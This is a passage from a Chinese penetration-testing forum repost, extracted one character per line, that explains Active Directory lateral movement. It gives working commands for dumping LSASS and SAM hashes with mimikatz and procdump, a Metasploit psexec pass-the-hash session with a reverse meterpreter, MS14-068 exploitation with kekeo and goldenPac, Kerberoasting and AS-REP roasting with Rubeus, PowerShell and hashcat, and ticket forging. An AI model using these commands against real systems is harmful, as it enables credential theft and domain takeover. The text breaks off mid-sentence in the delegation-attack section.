论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
渗透测试
[22026] 2021-05-30_常见横向移动与域控权限维持方法
文档创建者:
s7ckTeam
浏览次数:
3
最后更新:
2025-01-18
渗透测试
3 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前在线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2021-05-30_常见横向移动与域控权限维持方法
常
见
横
向
移
动
与
域
控
权
限
维
持
方
法
L
e
m
o
n
S
e
c
2
0
2
1
-
0
5
-
3
0
文
章
来
源
:
限
制
社
区
,
作
者
:
C
o
n
s
T
2
7
横
向
移
动
横
向
移
动
一
、
一
、
P
T
H
如
果
找
到
了
某
个
用
户
的
n
t
l
m
h
a
s
h
,
就
可
以
拿
这
个
n
t
l
m
h
a
s
h
当
作
凭
证
进
行
远
程
登
陆
了
其
中
若
h
a
s
h
加
密
方
式
是
r
c
4
,
那
么
就
是
p
a
s
s
t
h
e
h
a
s
h
若
加
密
方
式
是
a
e
s
k
e
y
,
那
么
就
是
p
a
s
s
t
h
e
k
e
y
注
意
N
T
L
M
和
k
e
r
b
e
r
o
s
协
议
均
存
在
P
T
H
:
N
T
L
M
自
然
不
用
多
说
k
e
r
b
e
r
o
s
协
议
也
是
基
于
用
户
的
c
l
i
e
n
t
h
a
s
h
开
始
一
步
步
认
证
的
,
自
然
也
会
受
P
T
H
影
响
那
前
提
就
是
要
获
取
h
a
s
h
值
了
H
A
S
H
获
取
获
取
1
.
使
用
m
e
t
e
r
p
r
e
t
e
r
里
的
m
i
m
i
k
a
t
z
模
块
2
.
使
用
m
e
t
e
r
p
r
e
t
e
r
自
带
的
h
a
s
h
获
取
模
块
3
.
向
目
标
机
上
传
m
i
m
i
k
a
t
z
远
程
调
用
m
i
m
i
k
a
t
z
.
e
x
e
d
u
m
p
出
h
a
s
h
,
m
i
m
i
k
a
t
z
需
要
免
杀
处
理
意
思
就
是
既
然
我
们
获
取
到
了
s
h
e
l
l
,
我
们
直
接
向
目
标
机
上
传
一
个
m
i
m
i
k
a
t
z
然
后
在
s
h
e
l
l
里
使
用
它
就
行
了
.
使
用
方
法
为
c
m
d
窗
口
打
开
m
i
m
i
k
a
t
z
.
e
x
e
,
进
入
m
i
m
i
k
a
t
z
终
端
,
然
后
输
入
m
i
m
i
k
a
t
z
指
令
即
可
4
.
上
传
p
r
o
c
d
u
m
p
到
目
标
机
,
获
取
到
l
s
a
s
s
.
d
m
p
文
件
后
将
其
传
回
本
地
又
m
i
m
i
k
a
t
z
来
d
u
m
p
哈
希
p
r
o
c
d
u
m
p
.
e
x
e
是
微
软
自
带
的
程
序
,
所
以
不
会
触
发
杀
毒
。
所
以
可
以
通
过
它
传
回
l
s
a
s
s
.
d
m
p
本
地
提
取
h
a
s
h
m
e
t
e
r
p
r
e
t
e
r
>
l
o
a
d
m
i
m
i
k
a
t
z
m
e
t
e
r
p
r
e
t
e
r
>
m
i
m
i
k
a
t
z
_
c
o
m
m
a
n
d
-
f
m
i
m
i
k
a
t
z
的
指
令
p
r
i
v
i
l
e
g
e
:
:
d
e
b
u
g
提
权
s
a
m
d
u
m
p
:
:
h
a
s
h
e
s
d
u
m
p
哈
希
或
者
m
e
t
e
r
p
r
e
t
e
r
>
m
s
v
/
k
e
r
b
e
r
o
s
/
w
i
d
g
s
t
m
e
t
e
r
p
r
e
t
e
r
>
h
a
s
h
d
u
m
p
m
e
t
e
r
p
r
e
t
e
r
>
r
u
n
w
i
n
d
o
w
s
/
g
a
t
h
e
r
/
s
m
a
r
t
_
h
a
s
h
d
u
m
p
(
推
荐
使
用
这
个
)
p
r
o
c
d
u
m
p
6
4
.
e
x
e
-
a
c
c
e
p
t
e
u
l
a
-
m
a
l
s
a
s
s
.
e
x
e
l
s
a
s
s
.
d
m
p
执
行
该
指
令
,
获
取
到
l
s
a
s
s
.
d
m
p
然
后
将
其
传
回
本
地
通
过
m
i
m
i
k
a
t
z
.
e
x
e
分
别
执
行
以
下
命
令
"
s
e
k
u
r
l
s
a
:
:
m
i
n
i
d
u
m
p
l
s
a
s
s
.
d
m
p
"
"
s
e
k
u
r
l
s
a
:
:
l
o
g
o
n
P
a
s
s
w
o
r
d
s
f
u
l
l
"
P
r
o
c
d
u
m
p
:
h
t
t
p
s
:
/
/
d
o
c
s
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
z
h
-
c
n
/
s
y
s
i
n
t
e
r
n
a
l
s
/
d
o
w
n
l
o
a
d
s
/
p
r
o
c
d
u
m
p
m
i
m
i
k
a
t
z
:
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
g
e
n
t
i
l
k
i
w
i
/
m
i
m
i
k
a
t
z
/
r
e
l
e
a
s
e
s
5
.
使
用
c
o
b
a
l
t
s
t
r
i
k
e
获
取
h
a
s
h
6
.
利
用
s
a
m
表
m
i
m
i
k
a
t
z
在
线
读
s
a
m
表
中
的
h
a
s
h
将
s
a
m
表
下
载
到
本
地
由
m
i
m
i
k
a
t
z
分
析
h
a
s
h
传
递
攻
击
传
递
攻
击
P
T
H
(
(
P
a
s
s
t
h
e
H
a
s
h
)
1
.
m
s
f
里
使
用
p
s
e
x
e
c
模
块
2
.
使
用
m
i
m
i
k
a
t
z
我
们
在
目
标
机
里
放
置
m
i
m
i
k
a
t
z
.
e
x
e
然
后
执
行
以
下
命
令
之
后
便
会
弹
出
一
个
c
m
d
窗
口
,
在
这
个
窗
口
里
链
接
机
器
即
可
b
e
a
c
o
n
>
h
a
s
h
d
u
m
p
b
e
a
c
o
n
>
m
i
m
i
k
a
t
z
m
i
m
i
k
a
t
z
指
令
p
r
i
v
i
l
e
g
e
:
:
d
e
b
u
g
t
o
k
e
n
:
:
e
l
e
v
a
t
e
l
s
a
d
u
m
p
:
:
s
a
m
r
e
g
s
a
v
e
H
K
L
M
S
Y
S
T
E
M
S
Y
S
T
E
M
r
e
g
s
a
v
e
H
K
L
M
S
A
M
S
A
M
在
远
端
s
h
e
l
l
使
用
以
上
命
令
导
出
S
Y
S
T
E
M
和
S
A
M
文
件
,
并
将
其
待
会
本
地
,
由
m
i
m
i
k
a
t
z
分
析
m
i
m
i
k
a
t
z
运
行
m
i
m
i
k
a
t
z
#
l
s
a
d
u
m
p
:
:
s
a
m
/
s
a
m
:
S
A
M
/
s
y
s
t
e
m
:
S
Y
S
T
E
M
D
o
m
a
i
n
:
S
T
U
1
S
y
s
K
e
y
:
f
d
4
6
3
9
f
4
e
2
7
c
7
9
6
8
3
a
e
9
f
e
e
5
6
b
4
4
3
9
3
f
L
o
c
a
l
S
I
D
:
S
-
1
-
5
-
2
1
-
1
9
8
2
6
0
1
1
8
0
-
2
0
8
7
6
3
4
8
7
6
-
2
2
9
3
0
1
3
2
9
6
S
A
M
K
e
y
:
0
9
9
d
1
9
1
5
d
b
1
b
0
e
5
c
f
4
1
f
1
f
0
9
0
8
d
c
7
e
1
7
R
I
D
:
0
0
0
0
0
1
f
4
(
5
0
0
)
U
s
e
r
:
A
d
m
i
n
i
s
t
r
a
t
o
r
H
a
s
h
N
T
L
M
:
3
1
d
6
c
f
e
0
d
1
6
a
e
9
3
1
b
7
3
c
5
9
d
7
e
0
c
0
8
9
c
0
R
I
D
:
0
0
0
0
0
1
f
5
(
5
0
1
)
U
s
e
r
:
G
u
e
s
t
R
I
D
:
0
0
0
0
0
3
e
8
(
1
0
0
0
)
U
s
e
r
:
l
i
u
k
a
i
f
e
n
g
0
1
H
a
s
h
N
T
L
M
:
3
1
d
6
c
f
e
0
d
1
6
a
e
9
3
1
b
7
3
c
5
9
d
7
e
0
c
0
8
9
c
0
m
s
f
5
e
x
p
l
o
i
t
(
m
u
l
t
i
/
h
a
n
d
l
e
r
)
>
u
s
e
e
x
p
l
o
i
t
/
w
i
n
d
o
w
s
/
s
m
b
/
p
s
e
x
e
c
/
/
以
r
o
o
t
启
动
m
s
f
[
*
]
N
o
p
a
y
l
o
a
d
c
o
n
f
i
g
u
r
e
d
,
d
e
f
a
u
l
t
i
n
g
t
o
w
i
n
d
o
w
s
/
m
e
t
e
r
p
r
e
t
e
r
/
r
e
v
e
r
s
e
_
t
c
p
m
s
f
5
e
x
p
l
o
i
t
(
w
i
n
d
o
w
s
/
s
m
b
/
p
s
e
x
e
c
)
>
s
e
t
l
h
s
o
t
1
9
2
.
1
6
8
.
6
4
.
1
3
3
l
h
s
o
t
=
>
1
9
2
.
1
6
8
.
6
4
.
1
3
3
m
s
f
5
e
x
p
l
o
i
t
(
w
i
n
d
o
w
s
/
s
m
b
/
p
s
e
x
e
c
)
>
s
e
t
l
h
o
s
t
1
9
2
.
1
6
8
.
6
4
.
1
3
3
l
h
o
s
t
=
>
1
9
2
.
1
6
8
.
6
4
.
1
3
3
m
s
f
5
e
x
p
l
o
i
t
(
w
i
n
d
o
w
s
/
s
m
b
/
p
s
e
x
e
c
)
>
s
e
t
l
p
o
r
t
4
4
3
l
p
o
r
t
=
>
4
4
3
m
s
f
5
e
x
p
l
o
i
t
(
w
i
n
d
o
w
s
/
s
m
b
/
p
s
e
x
e
c
)
>
s
e
t
r
h
o
s
t
1
9
2
.
1
6
8
.
5
2
.
1
3
8
r
h
o
s
t
=
>
1
9
2
.
1
6
8
.
5
2
.
1
3
8
m
s
f
5
e
x
p
l
o
i
t
(
w
i
n
d
o
w
s
/
s
m
b
/
p
s
e
x
e
c
)
>
s
e
t
S
M
B
U
s
e
r
A
d
m
i
n
i
s
t
r
a
t
o
r
S
M
B
U
s
e
r
=
>
A
d
m
i
n
i
s
t
r
a
t
o
r
m
s
f
5
e
x
p
l
o
i
t
(
w
i
n
d
o
w
s
/
s
m
b
/
p
s
e
x
e
c
)
>
s
e
t
S
M
B
P
a
s
s
8
a
9
6
3
3
7
1
a
6
3
9
4
4
4
1
9
e
c
1
a
d
f
6
8
7
b
b
1
b
e
5
/
/
一
般
选
择
N
T
L
M
H
A
S
H
S
M
B
P
a
s
s
=
>
8
a
9
6
3
3
7
1
a
6
3
9
4
4
4
1
9
e
c
1
a
d
f
6
8
7
b
b
1
b
e
5
m
s
f
5
e
x
p
l
o
i
t
(
w
i
n
d
o
w
s
/
s
m
b
/
p
s
e
x
e
c
)
>
r
u
n
s
e
k
u
r
l
s
a
:
:
p
t
h
/
u
s
e
r
:
a
d
m
i
n
i
s
t
r
a
t
o
r
/
d
o
m
a
i
n
:
"
x
x
x
.
c
o
m
"
/
n
t
l
m
:
6
5
4
2
d
3
5
e
d
5
f
f
6
a
e
5
e
7
5
b
8
7
5
0
6
8
c
5
d
3
b
c
/
/
自
行
修
改
3
.
使
用
c
o
b
a
l
t
s
t
r
i
k
e
在
c
o
b
a
l
t
s
t
r
i
k
e
里
找
到
域
控
,
然
后
使
用
p
s
e
x
e
c
模
块
,
选
择
一
个
本
地
h
a
s
h
即
可
。
二
、
二
、
M
S
1
4
-
0
6
8
这
个
洞
的
危
害
很
大
,
可
以
让
任
意
域
用
户
提
权
到
域
管
。
适
用
版
本
:
s
e
r
v
e
r
2
0
0
0
以
上
补
丁
:
k
b
3
0
1
1
7
8
0
M
1
4
0
6
8
利
用
利
用
1
.
工
具
k
e
k
e
o
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
g
e
n
t
i
l
k
i
w
i
/
k
e
k
e
o
/
r
e
l
e
a
s
e
s
/
t
a
g
/
2
.
2
.
0
-
2
0
2
0
0
7
1
8
具
体
方
法
为
,
在
k
e
k
e
o
里
先
执
行
k
e
r
b
e
r
o
s
:
:
p
u
r
g
e
清
空
票
据
然
后
再
执
行
e
x
p
l
o
i
t
:
:
m
s
1
4
0
6
8
/
u
s
e
r
:
x
x
x
/
p
a
s
s
w
o
r
d
:
x
x
x
/
d
o
m
a
i
n
:
x
x
x
/
p
t
t
即
可
。
n
e
t
u
s
e
1
9
2
.
1
6
8
.
2
2
2
.
1
3
1
c
$
然
后
就
d
i
r
域
控
c
$
试
试
,
如
果
可
以
就
说
明
提
权
成
功
了
(
不
是
每
次
都
能
成
功
的
)
2
.
g
o
l
e
n
p
a
c
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
m
a
a
a
a
z
/
i
m
p
a
c
k
e
t
-
e
x
a
m
p
l
e
s
-
w
i
n
d
o
w
s
/
b
l
o
b
/
m
a
s
t
e
r
/
g
o
l
d
e
n
P
a
c
.
e
x
e
这
个
工
具
好
用
,
执
行
类
似
上
述
命
令
,
就
能
返
回
一
个
域
控
的
s
y
s
t
e
m
权
限
的
c
m
d
s
h
e
l
l
回
来
,
感
觉
蛮
好
用
另
外
在
最
后
指
定
域
控
机
器
时
,
可
以
指
定
域
控
以
外
的
机
器
并
获
取
他
们
的
本
地
s
y
s
t
e
m
权
限
用
户
.
但
返
回
的
似
乎
不
是
域
控
?
三
、
三
、
k
e
r
b
e
r
o
a
s
t
K
e
r
b
e
r
o
a
s
t
攻
击
原
理
:
攻
击
者
从
T
G
S
-
R
E
P
中
提
取
加
密
的
服
务
票
证
。
由
于
服
务
票
证
是
用
链
接
到
请
求
S
P
N
的
帐
户
的
哈
希
加
密
的
,
所
以
攻
击
者
可
以
离
线
破
解
这
个
加
密
块
,
恢
复
帐
户
的
明
文
密
码
H
o
w
t
o
g
e
t
S
P
N
如
何
得
到
域
中
的
所
有
S
P
N
?
1
.
s
e
t
s
p
n
很
简
单
,
只
需
执
行
即
可
2
.
k
e
r
b
e
r
o
a
s
t
工
具
集
的
工
具
集
的
G
e
t
U
s
e
r
S
p
n
s
p
o
w
e
r
s
h
e
l
l
脚
本
脚
本
H
o
w
t
o
g
e
t
H
A
S
H
如
何
得
到
h
a
s
h
?
有
如
下
方
法
1
.
R
u
b
e
u
s
.
e
x
e
这
个
工
具
g
i
t
h
u
b
上
就
有
,
但
是
c
l
o
n
e
下
来
后
需
要
自
己
编
译
成
e
x
e
.
然
后
执
行
R
u
b
e
u
s
.
e
x
e
k
e
r
b
e
r
o
a
s
t
指
令
即
可
s
e
t
s
p
n
-
q
*
/
*
2
.
m
i
m
i
k
a
t
z
m
i
m
i
k
a
t
z
真
的
神
器
。
通
过
命
令
k
e
r
b
e
r
o
s
:
:
a
s
k
/
t
a
r
g
e
t
:
你
所
指
定
的
S
P
N
,
即
可
通
过
认
证
的
方
式
得
到
一
个
S
T
。
然
后
我
们
在
k
e
r
b
e
r
o
s
:
:
l
i
s
t
里
可
以
看
到
我
们
想
要
的
S
T
3
.
p
o
w
e
r
s
h
e
l
l
越
来
越
发
现
p
o
w
e
r
s
h
e
l
l
在
域
渗
透
中
的
重
要
性
了
输
入
以
下
指
令
,
即
可
完
成
H
A
S
H
获
取
然
后
m
i
m
i
k
a
t
z
导
出
即
可
H
o
w
t
o
e
x
p
o
r
t
h
a
s
h
获
得
了
S
T
票
据
,
但
怎
么
导
出
?
1
.
m
i
m
i
k
a
t
z
导
出
所
有
票
据
可
以
发
现
生
成
了
k
i
r
b
i
文
件
。
这
就
是
我
们
所
需
要
的
h
a
s
h
了
A
d
d
-
T
y
p
e
-
A
s
s
e
m
b
l
y
N
a
m
e
S
y
s
t
e
m
.
I
d
e
n
t
i
t
y
M
o
d
e
l
N
e
w
-
O
b
j
e
c
t
S
y
s
t
e
m
.
I
d
e
n
t
i
t
y
M
o
d
e
l
.
T
o
k
e
n
s
.
K
e
r
b
e
r
o
s
R
e
q
u
e
s
t
o
r
S
e
c
u
r
i
t
y
T
o
k
e
n
-
A
r
g
u
m
e
n
t
L
i
s
t
"
M
y
S
Q
L
/
w
i
n
7
.
x
i
e
.
c
o
m
:
3
3
0
6
/
M
y
S
Q
L
"
2
.
E
m
p
i
r
e
P
o
w
e
r
s
h
e
l
l
框
架
框
架
g
i
t
h
u
b
:
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
E
m
p
i
r
e
P
r
o
j
e
c
t
/
E
m
p
i
r
e
我
们
通
过
这
个
框
架
可
以
导
出
h
a
s
h
c
a
t
格
式
的
h
a
s
h
.
H
o
w
t
o
c
r
a
c
k
H
A
S
H
如
何
破
解
H
A
S
H
?
1
.
H
A
S
H
C
A
T
这
个
工
具
需
要
让
h
a
s
h
格
式
为
h
a
s
h
c
a
t
模
式
才
能
进
行
破
解
。
k
r
i
b
i
文
件
不
能
放
入
h
a
s
h
c
a
t
进
行
破
解
.
2
.
k
e
r
b
e
r
o
a
s
t
中
的
中
的
t
g
s
r
e
p
c
r
a
c
k
.
p
y
支
持
k
r
i
b
i
文
件
破
解
H
o
w
t
o
u
s
e
K
e
r
b
e
r
o
a
s
t
既
然
我
们
都
把
S
T
的
加
密
h
a
s
h
都
破
解
了
,
那
么
我
们
就
可
以
随
便
改
S
T
中
的
票
据
内
容
了
.
.
这
里
使
用
的
是
k
e
r
b
e
r
o
a
s
t
工
具
集
里
的
k
e
r
b
e
r
o
a
s
t
.
p
y
四
、
四
、
A
S
_
R
E
P
R
o
a
s
t
较
K
e
r
b
e
r
o
a
s
t
来
说
,
比
较
鸡
肋
。
它
的
原
理
是
在
不
开
启
k
e
r
b
e
r
o
s
预
身
份
验
证
的
前
提
下
,
获
得
其
他
用
户
的
A
S
_
R
E
S
,
并
破
解
加
密
s
e
s
s
i
o
n
k
e
y
的
c
l
i
e
n
t
h
a
s
h
。
H
o
w
t
o
g
e
t
H
A
S
H
1
.
R
u
b
e
u
s
然
后
就
会
搜
索
域
中
不
需
要
k
e
r
b
e
r
o
s
预
验
证
的
用
户
,
并
获
得
A
S
R
E
P
。
I
m
p
o
r
t
-
M
o
d
u
l
e
.
I
n
v
o
k
e
-
K
e
r
b
e
r
o
a
s
t
.
p
s
1
;
I
n
v
o
k
e
-
K
e
r
b
e
r
o
a
s
t
-
o
u
t
p
u
t
F
o
r
m
a
t
H
a
s
h
c
a
t
h
a
s
h
c
a
t
-
m
1
3
1
1
0
p
a
s
s
.
t
x
t
h
a
s
h
.
t
x
t
p
y
t
h
o
n
3
t
g
s
r
e
p
c
r
a
c
k
.
p
y
p
a
s
s
.
t
x
t
x
x
x
.
k
r
i
b
i
p
y
t
h
o
n
k
e
r
b
e
r
o
a
s
t
.
p
y
-
p
P
a
s
s
w
o
r
d
1
2
3
-
r
P
E
N
T
E
S
T
L
A
B
_
0
0
1
.
k
i
r
b
i
-
w
P
E
N
T
E
S
T
L
A
B
.
k
i
r
b
i
-
u
5
0
0
p
y
t
h
o
n
k
e
r
b
e
r
o
a
s
t
.
p
y
-
p
P
a
s
s
w
o
r
d
1
2
3
-
r
P
E
N
T
E
S
T
L
A
B
_
0
0
1
.
k
i
r
b
i
-
w
P
E
N
T
E
S
T
L
A
B
.
k
i
r
b
i
-
g
5
1
2
#
#
将
票
据
权
限
改
为
a
d
m
i
n
i
s
t
r
a
t
o
r
k
e
r
b
e
r
o
s
:
:
p
t
t
P
E
N
T
E
S
T
L
A
B
.
k
i
r
b
i
#
将
票
据
注
入
到
内
存
R
u
b
e
u
s
.
e
x
e
a
s
r
e
p
r
o
a
s
t
2
.
E
m
p
i
r
e
框
架
与
框
架
与
A
S
R
E
P
R
o
a
s
t
.
p
s
1
使
用
E
m
p
i
r
e
框
架
下
的
p
o
w
e
r
v
i
e
w
.
p
s
1
查
找
域
中
设
置
了
“
不
需
要
k
e
r
b
e
r
o
s
预
身
份
验
证
”
的
用
户
然
后
用
A
S
R
E
P
R
o
a
s
t
.
p
s
1
:
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
H
a
r
m
J
0
y
/
A
S
R
E
P
R
o
a
s
t
获
取
指
定
用
户
的
A
S
-
R
E
P
h
a
s
h
就
会
生
成
一
个
h
a
s
h
数
据
文
件
了
H
o
w
t
o
c
r
a
c
k
h
a
s
h
将
生
成
的
H
A
S
H
保
存
起
来
,
并
在
下
图
处
加
入
$
2
3
然
后
丢
给
h
a
s
h
c
a
t
跑
注
意
这
里
的
p
a
s
s
.
t
x
t
是
自
己
的
明
文
字
典
…
之
前
我
还
一
直
以
为
是
爆
破
出
来
的
结
果
.
原
来
是
一
个
一
个
的
用
明
文
字
典
去
爆
破
。
五
、
委
派
攻
击
五
、
委
派
攻
击
I
m
p
o
r
t
-
M
o
d
u
l
e
.
p
o
w
e
r
v
i
e
w
.
p
s
1
G
e
t
-
D
o
m
a
i
n
U
s
e
r
-
P
r
e
a
u
t
h
N
o
t
R
e
q
u
i
r
e
d
I
m
p
o
r
t
-
M
o
d
u
l
e
A
S
R
E
P
R
o
a
s
t
.
p
s
1
G
e
t
-
A
S
R
E
P
H
a
s
h
-
U
S
E
R
x
x
-
D
o
m
a
i
n
x
x
|
O
u
t
-
f
i
l
e
-
E
n
c
o
d
i
n
g
A
S
C
I
I
h
a
s
h
.
t
x
t
h
a
s
h
c
a
t
-
m
1
8
2
0
0
h
a
s
h
.
t
x
t
p
a
s
s
.
t
x
t
域
委
派
域
委
派
域
委
派
是
一
种
域
内
主
机
的
行
为
,
使
某
个
服
务
可
以
以
访
问
的
用
户
的
身
份
去
访
问
另
外
一
个
服
务
。
为
什
么
需
要
域
委
派
呢
,
比
如
现
在
有
w
e
b
服
务
器
和
文
件
服
务
器
,
当
用
户
A
访
问
w
e
b
服
务
器
去
请
求
某
个
资
源
时
,
w
e
b
服
务
器
上
本
身
并
没
有
该
资
源
,
所
以
w
e
b
服
务
器
就
会
从
文
件
服
务
器
上
调
用
这
个
资
源
,
其
中
发
生
的
过
程
若
以
域
委
派
的
形
式
进
行
,
那
么
就
是
:
用
户
A
访
问
w
e
b
服
务
器
,
服
务
器
再
以
用
户
A
的
身
份
去
访
问
文
件
服
务
器
。
发
生
域
委
派
的
服
务
一
般
为
机
器
账
户
和
服
务
账
户
。
域
委
派
分
为
三
种
:
域
委
派
分
为
三
种
:
非
约
束
性
委
派
,
约
束
性
委
派
,
基
于
资
源
的
约
束
性
委
派
非
约
束
性
委
派
非
约
束
性
委
派
非
约
束
性
委
派
的
原
理
是
:
非
约
束
性
委
派
的
原
理
是
:
用
户
想
访
问
服
务
A
,
于
是
向
K
D
C
提
交
认
证
,
K
D
C
发
现
A
是
非
约
束
性
委
派
,
于
是
会
把
T
G
T
放
在
S
T
中
一
并
给
用
户
。
然
后
用
户
用
这
个
S
T
去
访
问
服
务
A
,
服
务
A
就
相
当
于
获
得
了
用
户
的
T
G
T
,
把
T
G
T
放
入
l
s
a
s
s
进
程
,
然
后
就
可
以
拿
着
用
户
的
T
G
T
以
用
户
的
身
份
去
访
问
所
有
用
户
权
限
能
够
访
问
的
服
务
了
。
非
约
束
性
委
派
的
启
用
:
为
某
账
户
启
用
信
任
此
计
算
机
来
委
派
任
何
服
务
即
开
启
非
约
束
性
委
派
。
开
启
后
在
该
用
户
的
A
C
L
属
性
会
多
出
一
个
f
l
a
g
:
W
O
R
K
S
T
A
T
I
O
N
_
T
R
U
S
T
E
D
_
F
O
R
_
D
E
L
E
G
A
T
I
O
N
(
图
截
不
完
,
反
正
这
个
f
l
a
g
就
在
箭
头
所
指
处
的
后
面
)
非
约
束
委
派
的
设
置
需
要
特
权
,
该
特
权
通
常
仅
授
予
域
管
理
员
这
里
说
个
题
外
话
,
域
控
主
机
默
认
是
非
约
束
性
委
派
约
束
性
委
派
约
束
性
委
派
非
约
束
性
委
派
是
很
不
安
全
的
(
因
为
控
制
了
开
启
非
约
束
性
委
派
的
机
器
,
就
相
当
于
获
得
了
上
面
的
所
有
其
他
用
户
的
T
G
T
)
,
所
以
更
安
全
的
约
束
性
委
派
诞
生
了
。
约
束
性
委
派
多
了
两
个
委
派
协
议
,
S
4
U
2
S
E
L
F
S
4
U
2
P
R
O
X
Y
,
并
且
限
制
了
被
设
置
委
派
的
服
务
的
访
问
范
围
:
仅
能
被
委
派
到
被
指
定
的
服
务
。
S
e
E
n
a
b
l
e
D
e
l
e
g
a
t
i
o
n
约
束
性
委
派
的
大
致
流
程
:
约
束
性
委
派
的
大
致
流
程
:
用
户
访
问
开
启
约
束
性
委
派
的
服
务
A
(
情
况
一
:
无
S
4
U
2
S
E
L
F
参
与
)
首
先
需
要
经
过
K
D
C
认
证
,
K
D
C
发
现
服
务
A
开
启
了
约
束
性
委
派
,
于
是
在
T
G
S
_
R
E
S
返
回
给
用
户
S
T
1
(
可
转
发
S
T
)
,
用
户
拿
着
S
T
1
访
问
服
务
A
,
服
务
A
先
与
K
D
C
进
行
身
份
验
证
获
得
一
个
有
效
T
G
T
,
然
后
拿
着
S
T
1
经
过
S
4
U
2
P
R
O
X
Y
协
议
向
K
D
C
发
起
T
G
S
_
R
E
Q
,
K
D
C
返
回
S
T
2
(
用
户
身
份
的
S
T
)
,
然
后
服
务
A
拿
着
S
T
2
访
问
指
定
服
务
。
(
情
况
二
:
有
S
4
U
2
S
E
L
F
参
与
)
用
户
通
过
其
他
方
式
(
如
N
T
L
M
认
证
,
表
单
认
证
等
)
获
取
了
服
务
A
的
信
任
,
但
是
此
时
服
务
A
并
没
有
来
自
用
户
的
S
T
1
,
按
情
况
一
中
的
流
程
,
服
务
A
就
不
能
完
成
委
派
。
所
以
这
个
时
候
服
务
A
会
以
自
己
的
身
份
向
K
D
C
发
起
申
请
获
取
一
个
可
转
发
T
G
T
(
获
取
K
D
C
信
任
)
,
然
后
用
这
个
T
G
T
发
起
T
G
S
_
R
E
Q
获
得
指
定
用
户
的
S
T
1
,
既
然
获
取
了
S
T
1
,
就
继
续
情
况
一
中
的
流
程
即
可
了
。
也
就
是
说
S
4
U
2
S
E
L
F
是
用
户
通
过
非
k
e
r
b
e
r
o
s
协
议
完
成
认
证
的
情
况
下
,
自
动
向
K
D
C
获
取
S
T
1
的
一
个
协
议
。
而
S
4
U
2
P
R
O
X
Y
则
是
将
S
T
1
发
给
K
D
C
,
使
其
变
现
为
成
自
己
可
用
的
S
T
2
的
一
个
协
议
。
启
用
方
法
:
其
中
被
添
加
的
服
务
则
是
允
许
被
委
派
到
的
服
务
若
启
用
的
是
仅
使
用
k
e
r
b
e
r
o
s
,
那
么
u
s
e
r
a
c
c
o
u
n
t
c
o
n
t
r
o
l
属
性
仅
有
w
o
r
k
s
t
a
t
i
o
n
_
t
r
u
s
t
_
a
c
c
o
u
n
t
.
若
启
用
任
何
身
份
验
证
协
议
,
就
会
有
T
r
u
s
t
e
d
T
o
A
u
t
h
e
n
t
i
c
a
t
i
o
n
F
o
r
D
e
l
e
g
a
t
i
o
n
基
于
资
源
的
约
束
性
委
派
基
于
资
源
的
约
束
性
委
派
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
1
2
中
引
入
了
基
于
资
源
的
约
束
性
委
派
。
只
能
在
运
行
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
1
2
或
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
1
2
R
2
及
以
上
的
域
控
制
器
上
配
置
基
于
资
源
的
约
束
性
委
派
,
不
需
要
域
管
理
员
前
来
设
置
,
而
把
设
置
委
派
的
权
限
交
给
了
自
身
。
其
实
就
是
可
以
摆
脱
域
控
来
主
动
设
置
自
己
可
以
被
哪
些
账
户
委
派
访
问
。
非
约
束
性
委
派
攻
击
非
约
束
性
委
派
攻
击
非
约
束
性
委
派
有
巨
大
的
安
全
问
题
,
上
面
我
们
说
过
,
非
约
束
性
委
派
的
实
质
就
是
把
用
户
的
T
G
T
存
入
l
a
s
s
a
进
程
,
从
而
模
拟
用
户
身
份
进
行
各
种
委
派
访
问
,
所
以
我
们
只
需
控
制
非
约
束
性
委
派
攻
击
的
机
器
,
然
后
d
u
m
p
出
所
有
的
票
据
,
就
相
当
于
获
得
了
所
有
经
过
该
服
务
进
行
约
束
性
委
派
的
用
户
的
身
份
了
。
1
.
进
行
非
约
束
性
委
派
账
户
扫
描
这
里
提
一
下
怎
么
创
建
有
S
P
N
的
服
务
账
户
。
只
需
再
域
控
里
执
行
s
e
t
s
p
n
-
U
-
A
s
p
n
_
t
y
p
e
u
s
e
r
n
a
m
e
即
可
其
中
s
p
n
_
t
y
p
e
即
S
P
N
的
格
式
:
M
S
S
Q
L
S
v
c
/
<
f
q
d
n
>
:
[
<
p
o
r
t
>
|
<
i
n
s
t
a
n
c
e
n
a
m
e
>
]
<
/
i
n
s
t
a
n
c
e
n
a
m
e
>
<
/
p
o
r
t
>
<
/
f
q
d
n
>
M
S
S
Q
L
S
v
c
是
要
注
册
的
服
务
。
<
f
q
d
n
>
是
服
务
器
的
完
全
限
定
域
名
。
<
/
f
q
d
n
>
<
p
o
r
t
>
是
T
C
P
端
口
号
。
<
/
p
o
r
t
>
<
i
n
s
t
a
n
c
e
n
a
m
e
>
是
S
Q
L
S
e
r
v
e
r
实
例
的
名
称
。
<
/
i
n
s
t
a
n
c
e
n
a
m
e
>
这
里
我
们
随
便
输
一
个
,
比
如
s
b
/
c
a
o
n
i
m
a
这
种
都
行
.
这
里
采
用
p
o
w
e
r
s
p
l
o
i
t
下
的
p
o
w
e
r
v
i
e
w
.
p
s
1
根
据
我
网
上
很
多
搜
索
结
果
,
查
找
非
约
束
委
派
服
务
账
户
只
需
调
用
这
个
命
令
即
可
,
但
是
我
下
载
下
来
的
p
o
w
e
r
v
i
e
w
里
的
g
e
t
-
n
e
t
u
s
e
r
里
却
没
有
u
n
c
o
n
s
t
r
a
i
n
e
d
参
数
,
很
烦
。
所
以
用
一
个
比
较
原
始
的
方
法
来
判
别
(
适
合
在
用
户
少
的
情
况
下
)
直
接
调
用
G
e
t
-
N
e
t
U
s
e
r
-
S
P
N
找
到
所
有
服
务
账
户
或
者
G
e
t
-
d
o
m
a
i
n
c
o
m
p
u
t
e
r
找
到
所
有
机
器
账
户
,
然
后
判
断
其
u
s
e
r
a
c
c
o
u
n
t
c
o
n
t
r
l
里
有
